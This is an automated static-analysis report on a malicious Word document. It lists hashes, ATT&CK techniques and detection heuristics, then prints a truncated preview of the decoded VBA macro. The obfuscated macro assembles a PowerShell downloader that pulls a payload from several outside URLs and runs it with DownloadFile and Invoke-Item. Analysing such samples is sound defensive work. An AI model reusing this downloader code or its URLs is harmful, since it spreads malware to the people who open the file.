Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 65ae5c0e9abc9f14…

MALICIOUS

Office (OLE)

Size: 148.5 KB
Created: 2017-12-06 17:01:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: e9c7984e38699c1e43ed8564653ffa44
SHA-1: f227924837f4a896fb98706680e12e214e662577
SHA-256: 65ae5c0e9abc9f14e05db6ea1fd31c1b3a9a62e6b2e68f2355c00a02ef49ed2f
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The critical OLE_VBA_SHELL heuristic indicates the presence of a Shell() call within the VBA macros, and the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic further confirms this auto-execution with execution tokens. The script attempts to download a payload from the reconstructed URL 'http://achar-tech.com/aIwM/'. This strongly suggests a macro-based downloader designed to execute further malicious content.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6394109-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                   | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)      | 55123 bytes
SHA-256: 7e560b5ed7bd89654d2410f0e535e939b5bb18d7f8462a1e9cef57b2e33969f2
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "EQkYTQZMUP"
Function jKwnsPwmjVchZ()
FNHINDLsQtI = Array(UCase("ivdYnBDiBTY" + "mcLmbQYLzEiYa" + "uzbdMwslP" + "dkHUofWX" + "lSqdKjnkijZQE"))
dwlYZTcl = Mid("1SRwLJuJFlJON6pNCiCz3DXZa071smEUOKcspemenankKc+kKcg.comkKc+EUO+EUOkKc/kKc+kKcMAkKc+kKchq/,'+'h'+'tt'+'p:/kKc+EUO+EUOkKc/wwwEUO+EUO.achar-tehrkKc+kKc'+'an.kKEUO+EUOc+kKccom/aIwM/,hkKc+kKctjwM5SpKvv", 31, 157)
KllJsiVCR = Array(UCase("UdGPpCpjd" + "EWPtjKuEIcV" + "ETNmYoQEnRuEG" + "uVsJXrRi" + "TpzLDIu"))
UBXjujihTP = Array(UCase("ZHGCXGbABMDJqI" + "XTiGfpv" + "TRtZMKE" + "rYmiNicwRRkQd" + "AtijLMrJZId"))
CkFNZ = Array(UCase("ULDzduUi" + "jrGZdlaWjtzP" + "LLLTdAL" + "qcVpNnaFfBWqz" + "CMhldOhJd"))
JOTsD = Mid("VzdCvjRhsdEwBjqUjlw02),[StrIng][cH'+'ar]39).rePlaCE(([cHar'+']HpE7hIb", 21, 42)
RNzvrEjzau = Array(UCase("mlihPqz" + "LlEaqorjpN" + "iZsQAuj" + "rwhzdEJvrUjCtT" + "PPoDpWV"))
fzSmMIjcdBi = Array(UCase("sOzsnKQTSv" + "PkjQwARBrdZIt" + "wmsXzJhw" + "zzohRVk" + "XBZmcwV"))
rJzzWcXfNGz = Array(UCase("QciRRwmNTkBFms" + "DcIXcVXiuVzsG" + "ibSVodw" + "qMvukINKAPWZ" + "PEjtZsukv"))
qvocsBluIjI = Mid("0pEFBti4HVG9azzbkEUO+EUOKcreak;}catch{writkKc+kKce-hoskKc+kKctkKc+'+'kKc RJPkKc+kKc_.'+'ExckK6kK0Z9ZFnwBuPTZkDr", 17, 77)
WIlRmGqb = Array(UCase("NQHlsTFGjpY" + "wVmMQklRJS" + "fGbBHTWWnWrjtZ" + "HdthzczMF" + "PNWrMEV"))
FKYhAa = Array(UCase("FjNoIjjwP" + "VlwchkOVjUkVj" + "PXlcOkCwvupO" + "UEbRRGjzdH" + "LpdZAbh"))
MmqXD = Array(UCase("phEWwziskn" + "KzJPYzW" + "FwzkMvIzNV" + "CiAQQjnEkK" + "fijzlnMBQ"))
NkljcRmATlo = Mid("5zJEXtcTpKcEUO+EUOskKc+kKcukKc+kKcsa.ckKc+kKcok'+'Kc+kEU'+'O+E'+'UOKcm/wRhkKcEUbS", 10, 70)
dcXICSd = Array(UCase("zfYlzGjfoXqB" + "TNuQIDSPzkmPh" + "YGczUMFOr" + "TdKhbuamGRsbjI" + "XPUCvmVQpKYLZ"))
wwwNAqmBhX = Array(UCase("BrUaszrbq" + "RWNlUJi" + "fkslJrQSDNKUl" + "FJBrjqYm" + "duKwIQvibFTVfU"))
ubbOXHJiatL = Array(UCase("hCYlviFzOsPw" + "ZMVAWCREEQ" + "vjkDTPijMaWdZ" + "WiUwbwzN" + "YAdaUCGicmkq"))
zcQGdF = Mid("qmCe(([CHar]69+[CHar]85+[CHar]79),[strINg][CHar]39).rEPlaCe(([CHar]114+[CHar]104+[CHar]103),'|').rEPlaCe('OAE',[strCwhmjzqQiLzbDr4WS8kNMBjIDIj3Tdd", 3, 113)
OqVtNUqVTrq = Array(UCase("hcJZtdQVP" + "REkcdsU" + "oPrzvHBHiiPSqZ" + "lJDjwsSMZvqrM" + "CwMwbqFY"))
vSdAELoXk = Array(UCase("zCizJfmtD" + "vtzXzGdRqiwM" + "poOhGwt" + "pQIhRTcpSbpVS" + "jUiIYzUtHQlz"))
TRvwhH = Array(UCase("YOTJTwuNGkhD" + "QiIhDPOU" + "wibJkBDAMsZM" + "zJSjitPfNK" + "nrPGwzlhN"))
lvTrViazirS = Mid("wp0nZSc+kKc--prppwkVGij5TbPZw", 7, 8)
DJQitoWLZD = Array(UCase("LvzfwJqFdrqjm" + "bYHIqkI" + "tCzXuXwJ" + "vSfQuUvsLcbDd" + "cmwsUzHuOfDBv"))
YqwapYB = Array(UCase("SohKOtKFXpizw" + "zPUlUFGiTKWt" + "zCNGrwjfUkZQ" + "FZqVnnuhHjfAMI" + "jUWoUIMDKimA"))
VVtpFZzvSo = Array(UCase("MKWvUYNO" + "anhzEcOfamVlDL" + "bOYzobHNApfNc" + "AjJVjBTd" + "CCCdzrmYI"))
fcDzGMRmkD = Mid("zKYn74hC4VVk1H0Rs0KPvcQYIanC6{try{RJPk'+'Kc+k'+'Kcfranc.Downk'+'K'+'c+kKcloadFileEUO+EUO(RJEUO+EUOPabckKc+k'+'K'+'c.ToString(),kKc+kKc '+'RJPhuakKc+kKcskKc+kKc)kKc+kKc;kKc+k'+'KcInvoke-Item(RJPhuas)kKc+kKc;bkKc+YNrvGpv", 30, 182)
BaZAmn = Array(UCase("CiiuUVAjs" + "XizDpThGfqzvzN" + "wrsWjnAmifcE" + "jrIArXzFVEXk" + "bHKQHfQJYdI"))
KwftlbN = Array(UCase("dTGzQZVSahJZPl" + "ZGLPWKZwzV" + "mwJWNRWOzpujsw" + "itwHdnQH" + "lbImnDVJiW"))
ACqkqwtWXKd = Array(UCase("ZpMtXwLWB" + "abRUqQsZiTJOY" + "SQHqIDW" + "iHMpOzoLiDKfsr" + "vbPdsDRJKQ"))
uJEhzf = Mid("AFhjLRNWzCLBwc+k'+'Kcch(RJPabkKc+kKcc in RJPkKc+kKcbkKc+kKccd)Aq", 14, 49)
TpzhjBq = Array(UCase("WIDTsCAljfZST" + "bjCqrGVq" + "lmIkavUlCWIo" + "pcOamfasLI" + "aLWTTmPRfWShk"))
fbBJmSKaq = Array(UCase("bHpUOwUf" + "JHABtlSoFEtIau" + "PtZirNwB" + "DXhWJpLLNu" + "naNjHlcE"))
fWFHuRt = Array(UCase("MpIVdEQqjThwQ" + "bzAiCavH" + "VUirqPbSQ" + "GiLsAspniCArM" + "XWRNUnWsFbmB"))
SVZSdY = Mid("XJ4jzTAqlb-JOiN'') ( ('((EUO. ( Zk5pshO'+'
... (truncated)